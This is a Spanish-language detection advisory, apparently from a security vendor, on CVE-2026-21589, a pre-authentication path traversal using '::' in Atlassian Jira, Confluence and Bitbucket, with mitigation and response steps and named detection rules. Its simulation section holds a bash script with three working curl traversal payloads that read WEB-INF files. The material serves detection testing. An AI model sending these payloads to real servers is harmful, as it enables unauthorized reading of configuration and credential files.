CVE-2026-21589: Vulnerabilidad de Lectura de Archivos sin Autenticación en Atlassian Jira y Confluence
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Una vulnerabilidad crítica de lectura de archivos arbitraria preautenticación, CVE-2026-21589, afecta a múltiples productos de Atlassian, incluidos Jira, Confluence y Bitbucket. Los atacantes pueden abusar de una falla de recorrido de rutas que involucra el :: delimitador para acceder a archivos sensibles dentro del webroot de la aplicación. La explotación exitosa puede exponer credenciales de Atlassian Crowd en texto plano, lo que potencialmente permitiría comprometer el sistema de gestión de identidades de manera administrativa.
Investigación
Los investigadores analizaron la vulnerabilidad en el atlassian-plugins-webresource JAR comparando las versiones afectadas y parcheadas. Encontraron que una función específica convierte los dos puntos dobles en barras diagonales, lo que hace posible el recorrido de rutas. Al apuntar a complementos de recursos seleccionados con barras diagonales finales, los investigadores pudieron recuperar archivos sensibles como WEB-INF/web.xml and crowd.properties.
Mitigación
Atlassian ha publicado avisos de seguridad y versiones corregidas para todos los productos afectados. Las organizaciones deben actualizar a las versiones parcheadas recomendadas, como Bitbucket 10.5.1, Confluence 10.2.19 y Jira 11.3.12. Implementar reglas WAF capaces de detectar patrones de recorrido de rutas que involucren dos puntos dobles, caracteres codificados y solicitudes de recursos sospechosas puede proporcionar protección adicional.
Respuesta
Cuando se detectan intentos sospechosos de recorrido de rutas que involucran :: en las URLs, los respondedores de incidentes deben identificar y aislar inmediatamente la instancia de Atlassian dirigida. Revisar Atlassian Crowd en busca de creación no autorizada de cuentas, escalación de privilegios u otra actividad anómala. Auditar solicitudes dirigidas a WEB-INF recursos y rotar cualquier credencial potencialmente expuesta a través de archivos de configuración como crowd.properties.
Flujo del Ataque
Todavía estamos actualizando esta parte.
Detecciones
Posible Usuario de Jira Fue Agregado a Administradores (a través de servidor web)
Posible Usuario de Jira Fue Creado (a través de servidor web)
Posible Intento de Explotación de CVE-2026-21589 (Jira de Atlassian, Confluence, BitBucket Lectura de Archivos Arbitraria Preautenticación) (a través de servidor web)
Productos de Atlassian Lectura de Archivos Arbitraria mediante Recorrido de Rutas [Servidor web]
Ejecución de Simulación
-
Narrativa del Ataque & Comandos: El atacante está realizando reconocimiento contra una instancia sospechosa de Atlassian. Está utilizando un patrón de explotación conocido para CVE-2026-21589, que aprovecha una técnica específica de omisión usando dos puntos dobles (
::) para navegar por el sistema de archivos a través de la interfaz web. El objetivo es exfiltrarweb.xmlpara mapear la estructura interna de la aplicación y potencialmente obtener credenciales para un movimiento lateral adicional. -
Script de Prueba de Regresión:
#!/bin/bash # Script de simulación para activar la regla de detección de Recorrido de Rutas de Atlassian TARGET_URL="http://localhost" echo "[+] Iniciando Simulación: Recorrido de Rutas de Atlassian" echo "[*] Intentando Pago 1: Recorrido de Jira web.xml..." curl -s -I "$TARGET_URL/download/resources/jira.webresources:color-picker-popup/images/..::..::..::..::..:WEB-INF::web.xml" echo "[*] Intentando Pago 2: Recorrido de Confluence web.xml..." curl -s -I "$TARGET_URL/s/1/_/download/resources/com.atlassian.confluence.plugins.dashboard-actions/images/..::..::..::..::..::..::..:WEB-INF::web.xml" echo "[*] Intentando Pago 3: Recorrido de Bitbucket urlrewrite.xml..." curl -s -I "$TARGET_URL/s/1.0/_/download/resources/com.atlassian.bitbucket.server.bitbucket-webpack-INTERNAL:avatar/avatar/..::..::..::..::..:WEB-INF::urlrewrite.xml" echo "[+] Simulación Completa. Verifique SIEM para alertas." -
Comandos de Limpieza:
# No se realizan cambios persistentes en el sistema; no se requiere limpieza. echo "[+] No es necesario limpiar. La simulación no fue destructiva."